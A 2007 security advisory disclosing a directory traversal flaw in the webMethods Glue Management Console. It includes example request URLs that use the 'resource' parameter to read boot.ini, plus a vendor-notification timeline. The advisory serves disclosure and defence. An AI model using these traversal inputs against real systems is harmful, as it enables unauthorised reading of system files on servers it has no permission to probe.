aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 11-Apr-2007 Software: webMethods - webMethods Glue Management Console http://www.webmethods.com/ "With webMethods Glue developers can easily create SOAP interfaces for their existing Java and C/C++ applications, and legacy systems can be easily Web service-enabled, allowing reuse. webMethods Glue includes a compact, high-performance implementation of important standards such as HTTP, Servlets, XML, SOAP, WSDL, and UDDI, and interoperates with Microsoft .NET, IBM WebSphere, BEA WebLogic, Apache Axis, and other Web service platforms." Versions affected: Glue 6.5.1 and below. Vulnerability discovered: Directory Traversal. Vulnerability impact: Medium - Read arbitrary system files. Vulnerability information: The webMethods Glue Management Console includes HTML pages via the /console?resource=console/index.html variable, which is prone to a classic traversal attack. Examples: http://glueconsole:8080/console?resource=../../../boot.ini http://glueconsole:8080/console?resource=boot.ini http://glueconsole:8080/console?resource=c:boot.ini Would return the contents of the 'boot.ini' file. Note that 'c:boot.ini' is also valid. It may be possible (but untested) to traverse other volumes. References: aushack.com advisory http://www.aushack.com/advisories/200704-webmethods.txt Credit: Patrick Webster ( patrick (at) aushack (dot) com [email concealed] ) Disclosure timeline: 20-Mar-2007 - Discovered during quick audit. 23-Mar-2007 - Vendor notified. No response. 11-Apr-2007 - Public disclosure. EOF